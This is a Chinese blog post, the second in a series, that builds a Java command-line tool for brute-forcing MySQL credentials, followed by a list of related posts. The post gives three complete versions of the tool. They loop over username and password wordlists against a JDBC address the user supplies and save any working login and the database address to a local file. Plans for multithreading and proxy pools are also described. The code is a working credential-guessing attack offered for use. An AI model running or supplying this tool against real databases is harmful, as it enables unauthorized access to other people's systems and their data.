2. 程式人生 > 實用技巧 >記-一個數據庫密碼爆破工具的成長曆程(2)

記-一個數據庫密碼爆破工具的成長曆程(2)

阿新 發佈:2020-12-12

資料庫密碼爆破工具的優化

  1. 使用scanner從控制檯讀取字典位置和資料庫位置
  2. 在控制檯輸出密碼使用起來還是不太方便,將正確的密碼通過位元組流寫入到一個文件中。
  3. 密碼都寫了,不妨吧資料庫的地址和賬號密碼一起寫入。
  4. 目前爆破僅限於密碼,所以後面可以設計迴圈巢狀將賬戶密碼一起爆破。
  5. 爆破目前使用的是單執行緒,所以為了後期的實用性,會加上多執行緒和代理池。
  6. 程式碼格式的檔案對很多人來說使用還是不夠方便,所以圖形化介面也是需要進行的。

目前程式碼:

package jsp;

import java.io.*;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.Scanner;

public class sql {
    public static void main(String[] args) throws IOException {
        Scanner sc1 = new Scanner(System.in);
        System.out.println("請輸入爆破字典地址(絕對路徑)");
        String zdadd = sc1.next();
        Scanner sc2 = new Scanner(System.in);
        System.out.println("請輸入資料庫地址(jdbc格式)");
        String sqladd = sc2.next();
        String path = zdadd;
        File file = new File(path);
        StringBuilder result = new StringBuilder();
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(file), "UTF-8"));//構造一個BufferedReader類來讀取檔案

            String s = null;
            while ((s = br.readLine()) != null) {//使用readLine方法,一次讀一行
                result.append(System.lineSeparator() + s);
                try {
                    Class.forName("com.mysql.jdbc.Driver");
                    String url = sqladd;
                    String username = "root1";
                    String password = s;
                    Connection conn = DriverManager.getConnection(url,username,password);
                    System.out.println("密碼正確");
                    System.out.println("正確密碼是"+s);
                } catch (ClassNotFoundException | SQLException e) {
                    System.out.println("密碼錯誤");
                }
            }
            br.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

第一步的優化已經完成,現在就要進行第二步。

第二步和第三步我想做的都是把獲得的結果輸入到檔案中,要做到這一步,需要使用到一個檔案寫入。

也就是下面這行程式碼:

FileWriter fw = new FileWriter("C://a/gpasswd.txt");                  BufferedWriter bw = new BufferedWriter(fw);                    
bw.write("資料庫地址是:"+url+"\r\n");
bw.write("資料庫賬號是:"+username+"\r\n");                    
bw.write("資料庫密碼是:"+s+"\r\n");                    
bw.close();
fw.close();

第一行是指定了檔案寫入的位置,第二行則建立了一個檔案寫入的物件。然後就是很簡單,加上註釋之後,把輥間的資訊寫入到檔案之中,然後釋放資源。

所以,在添加了這些之後,程式碼就會變成下面這樣。

package jsp;

import java.io.*;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.Scanner;

public class sql {
    public static void main(String[] args) throws IOException {
        Scanner sc1 = new Scanner(System.in);
        System.out.println("請輸入爆破字典地址(絕對路徑)");
        String zdadd = sc1.next();
        Scanner sc2 = new Scanner(System.in);
        System.out.println("請輸入資料庫地址(jdbc格式)");
        String sqladd = sc2.next();
        String path = zdadd;
        File file = new File(path);
        StringBuilder result = new StringBuilder();
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(file), "UTF-8"));//構造一個BufferedReader類來讀取檔案

            String s = null;
            while ((s = br.readLine()) != null) {//使用readLine方法,一次讀一行
                result.append(System.lineSeparator() + s);
                try {
                    Class.forName("com.mysql.jdbc.Driver");
                    String url = sqladd;
                    String username = "root1";
                    String password = s;
                    Connection conn = DriverManager.getConnection(url,username,password);
                    FileWriter fw = new FileWriter("C://a/gpasswd.txt");
                    BufferedWriter bw = new BufferedWriter(fw);
                    bw.write("資料庫地址是:"+url+"\r\n");
                    bw.write("資料庫賬號是:"+username+"\r\n");
                    bw.write("資料庫密碼是:"+s+"\r\n");
                    bw.close();
                    fw.close();
                } catch (ClassNotFoundException | SQLException e) {
                }
            }
            br.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

然後就是第四步了,也就是到目前位置,我們爆破僅限於密碼,並沒有對使用者名稱同時進行一個爆破,所以,這裡就要嘗試進行使用者名稱的爆破。

這一步其實要做到很簡單,因為我們之前已經完成了定義字典的位置,然後利用bufferedReader將裡面的內容讀取出來,現在只是多增加一個字典的讀取,然後將外界的迴圈變成兩個就可以了。

通俗一點,就是兩個迴圈的巢狀。

package jsp;

import java.io.*;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.Scanner;

public class sql {
    public static void main(String[] args) throws IOException {
        Scanner sc = new Scanner(System.in);
        System.out.println("請輸入使用者名稱爆破字典地址(絕對路徑)");
        String unadd = sc.next();
        Scanner sc1 = new Scanner(System.in);
        System.out.println("請輸入密碼爆破字典地址(絕對路徑)");
        String pdadd = sc1.next();
        Scanner sc2 = new Scanner(System.in);
        System.out.println("請輸入資料庫地址(jdbc格式)");
        String sqladd = sc2.next();
        String path1 = unadd;
        File file1 = new File(path1);
        StringBuilder result1 = new StringBuilder();
        String path = pdadd;
        File file = new File(path);
        StringBuilder result = new StringBuilder();
        try {
            BufferedReader br1 = new BufferedReader(new InputStreamReader(new FileInputStream(file1),"UTF-8"));
            String s1 = null;
            while((s1 = br1.readLine())!=null) {
                result1.append(System.lineSeparator() + s1);

                BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(file), "UTF-8"));//構造一個BufferedReader類來讀取檔案

                String s = null;
                while ((s = br.readLine()) != null) {//使用readLine方法,一次讀一行
                    result.append(System.lineSeparator() + s);
                    try {
                        Class.forName("com.mysql.jdbc.Driver");
                        String url = sqladd;
                        String username = s1;
                        String password = s;
                        Connection conn = DriverManager.getConnection(url, username, password);
                        FileWriter fw = new FileWriter("C://a/gpasswd.txt");
                        BufferedWriter bw = new BufferedWriter(fw);
                        bw.write("資料庫地址是:" + url + "\r\n");
                        bw.write("資料庫賬號是:" + username + "\r\n");
                        bw.write("資料庫密碼是:" + s + "\r\n");
                        bw.close();
                        fw.close();
                    } catch (ClassNotFoundException | SQLException e) {
                    }
                }
                br.close();
            }
            br1.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

到了這一步,一個簡單的Mysql資料庫賬號密碼的爆破工具已經結束了。目前來說,這個工具的實用性不高,只能針對於mysql資料庫,後面如果有一些別的思路,會針對這個工具再進行修改。

針對於多執行緒等問題,過段時間會再進行修復。

相關推薦

--個數密碼爆破工具成長1

個數密碼爆破工具 目前完成: package jsp; import java.io.*; import java.sql.Connection;

-個數密碼爆破工具成長2

資料庫密碼爆破工具的優化 使用scanner從控制檯讀取字典位置和資料庫位置 在控制檯輸出密碼使用起來還是不太方便,將正確的密碼通過位元組流寫入到一個文件中。

原來提升個數的效能並沒有那麼難!TiDB 效能挑戰賽完結撒花

2019 年 11 月初,我們開啟了「TiDB 挑戰賽第一季之 效能挑戰賽」,比賽為期三個月,期間選手將通過完成一系列難度不同的任務來獲得相應的積分。賽程過去三分之一時,已經取得了十分耀眼的 階段性成果。三個月

[GWCTF 2019]我有個數

該題考查cve-2018-12613-PhpMyadmin後臺檔案包含漏洞使用御劍進行掃描發現phpmyadmin/目錄,無需密碼便可以進入檢視相關版本資訊

個數通常包含一個或多個表

資料庫表 個數通常包含一個或多個表。每個表有一個名字標識例如:\"Websites\",表包含帶有資料的記錄

個數死鎖的案例

昨天一個專案的生產環境出現了資料庫死鎖問題,導致死鎖的訂單號已經提交給第三方,但是由於出錯回滾到該訂單號未記錄的狀態,結果後續的單子使用的單號仍以該單號開始,這在第三方看來不是新單,而是舊單重複呼叫介

帶有多對多的modleform表單儲存到另個數遇到的問題

帶有多對多的modleform表單儲存到另個數遇到的問題 環境介紹 django版本1.11,資料庫做了主從同步,讀寫分離。

Execl資料匯入到資料庫及個數匯入到另個數

:首先是Execl匯入到資料庫資料庫以2008為例 需求:把Execl的資料匯入到資料庫。

MySQL用truncate命令快速清空個數中的所有表

1. 先執行select語句生成所有truncate語句 語句格式: select CONCAT(\'truncate TABLE \',table_schema,\'.\',TABLE_NAME,\';\') from INFORMATION_SCHEMA.TABLES where table_schema in (\'資料庫1\',\'資料

Django實戰總結 - 快速開發個數查詢服務

、簡介 Django 是一個開放原始碼的 Web 應用框架,由 Python 寫成。 Django 只要很少的程式碼就可以輕鬆地完成一個正式網站所需要的大部分內容,並進一步開發出全功能的 Web 服務。

mybatis實現個數一對多的查詢結果對映到java實體類

技術標籤:mybatis 、測試表格:test1、test2 二、對應java實體類:test1中包含test2的list

mysql 建立一個使用者,指定個數,表讀寫許可權

轉之: 更多相關: 建立表的基本命令   create table menber( id int(10) NOT NULL AUTO_INCREMENT,PRIMARY KEY(id),

利用Python從個數中查詢結果插入到另個數

技術標籤:mysql資料庫cursorsqlitepython import pymysql import pandas as pd DB = {\'host\': \'****\',

postgresql限制某個使用者僅連線某個數的操作

建立資料庫bbb且owner為使用者b: postgres9.6@[local]:5432 postgres# create database bbb owner b;

MySQL多資料庫合併到個數

背景:將多臺mysql伺服器上的合併到臺 實現原理:如果分平臺給的資料是sql那第3、4、5步可以省略

使用Python製作個數預處理小工具

在我們平常使用Python進行資料處理與分析時,在import完大堆之後,就是對資料進行預覽,檢視資料是否出現了缺失值、重複值等異常情況,並進行處理。

thinkphp 連線另外個數,及批量更新儲存

在config/app.php中新增: \'DB_CONFIG\'=>array(// 資料庫型別\'type\'=> \'mysql\',// 伺服器地址\'hostname\'=> \'127.0.0.1\',// 資料庫名\'database\'=> \'test\',// 資料庫使用者名稱\'username\

在thinkphp中向另個數批量插入與更新

批量插入1000萬條資料: public function insertData(){set_time_limit(0);ini_set(\"memory_limit\",-1);$startTime = time();// 插入100w條資料,測試用時 109s// 插入1000w條資料,測試用時 1339s$num = 1000000

構建應用程式時生成個數

這個場景很簡單--您希望在構建應用程式時生成一個數據庫模式建立指令碼(然後在目標資料庫上執行指令碼)--這在Hibernate 3中相對容易4不相容,當然,對於每一個新專案,您都應該從Hibernate 4開始。那該怎麼辦呢?這

SQL Server --資料庫設計 (如何設計個數?)

資料庫設計概述 資料庫設計的困難與關鍵問題? 成功的資料庫的特點: 資料庫設計的特點